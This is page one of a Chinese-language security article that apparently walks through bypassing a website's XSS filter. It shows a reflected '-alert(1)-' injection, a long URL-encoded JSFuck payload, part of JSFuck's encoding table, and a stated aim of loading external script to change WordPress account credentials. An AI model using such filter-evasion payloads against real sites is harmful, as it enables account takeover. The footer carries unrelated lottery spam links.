歡迎來到 黑吧安全網 聚焦網絡安全前沿資訊,精華內容,交流技術心得!

看我如何繞過像PRO這樣的XSS過濾器(XSS高級方法)

來源:本站整理 作者:佚名 時間:2019-11-16 TAG: 我要投稿

JavaScript代碼中如果存在代碼注入漏洞的話,那確實是一個令人頭疼的問題,由于這個項目并不是我們為企業環境做的滲透測試項目,因此我們可以直接將技術細節公布給大家。
簡而言之,我們在某網站上發現了一個安全漏洞,經過一段時間的代碼分析之后,我們成功發現了一個存在XSS漏洞的節點:
http://website.com/dir/subdir
在該節點的JavaScript代碼中,有如下代碼:
function("/DIR/SUBDIR",params);
使用Burp Suite掃描之后,我們發現在URL結尾添加“-alert(1)-”(http://website.com/dir/subdir/”-alert(1)-”)將能夠反射XSS,瀏覽器會告訴我們“unable to find function ALERT(1)”:

那么接下來,我們需要測試服務器到底過濾掉了什么,比如說是“”、“//”、“\”還是“.”。
尋找可用的Payload
我們也尋找到了一些解決方案,而且都跟jsfuck.com有關。

當然了,在這個站點我們也可以執行一次“alert(1)”,但這只是低危的XSS,我們想要將該漏洞提升為高;驀乐芈┒。為了實現這個目標,我們將需要加載一個外部JS文件,并且能夠在不需要任何用戶交互的情況下執行任意Web行為。
下圖顯示的是一個WordPress Payload,我們的目標是在目標網站中加載要一個外部JS文件,并修改賬號密碼以及郵箱:

制作JsFuck Payload,在JsFuck代碼中,簡單地“alert(1)”會被轉換為:
"-%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!!%5B%5D%2B!!%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!!%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D%5B(%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!!%5B%5D%2B!!%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!!%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D)%5B!!%5B%5D%2B!!%5B%5D%2B!!%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!!%5B%5D%2B!!%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!!%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D)%5B%2B!!%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B!!%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!!%5B%5D%2B!!%5B%5D%2B!!%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!!%5B%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!!%5B%5D%2B!!%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!!%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D)%5B!!%5B%5D%2B!!%5B%5D%2B!!%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!!%5B%5D%2B!!%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!!%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D)%5B%2B!!%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!!%5B%5D%5D%5D((!!%5B%5D%2B%5B%5D)%5B%2B!!%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!!%5B%5D%2B!!%5B%5D%2B!!%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!!%5B%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B!!%5B%5D%5D%2B(!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!!%5B%5D%2B!!%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!!%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D)%5B!!%5B%5D%2B!!%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!!%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!!%5B%5D%2B!!%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!!%5B%5D%2B!!%5B%5D%2B!!%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!!%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D)()(%2B!!%5B%5D)-"
如果我想要實現“alert(document.cookie)”,那么整個JsFuck代碼估計要到13000多個字符了。我發現,只要字符超過2500-2700個之后,目標站點的服務器就會返回“錯誤400”。
接下來,我們研究一下JsFuck的工作機制:
const SIMPLE = {
        'false':      '![]',
        'true':       '!0',
        'undefined':  '0[0]',
        'NaN':        '+[!0]',
        'Infinity':   '+(+!0+(!0+[])[!0+!0+!0]+[+!0]+[0]+[0]+[0])' // +"1e1000"
      };
    const CONSTRUCTORS = {

[1] [2] [3]  下一頁

【聲明】:黑吧安全網(http://www.650547.live)登載此文出于傳遞更多信息之目的,并不代表本站贊同其觀點和對其真實性負責,僅適于網絡安全技術愛好者學習研究使用,學習中請遵循國家相關法律法規。如有問題請聯系我們,聯系郵箱[email protected],我們會在最短的時間內進行處理。
  • 最新更新
    • 相關閱讀
      • 本類熱門
        • 最近下載
        安徽快3自由的百科 云南十一选五开奖今 青海快3走势图今天快3 幸运飞艇骗局揭秘 黑龙江36选7开奖信息 河南福彩快三大小图 深圳风采每周怎么开奖 在线股票涨跌幅计算器 快3走势图 常山股份投资价值 广西快乐双彩结果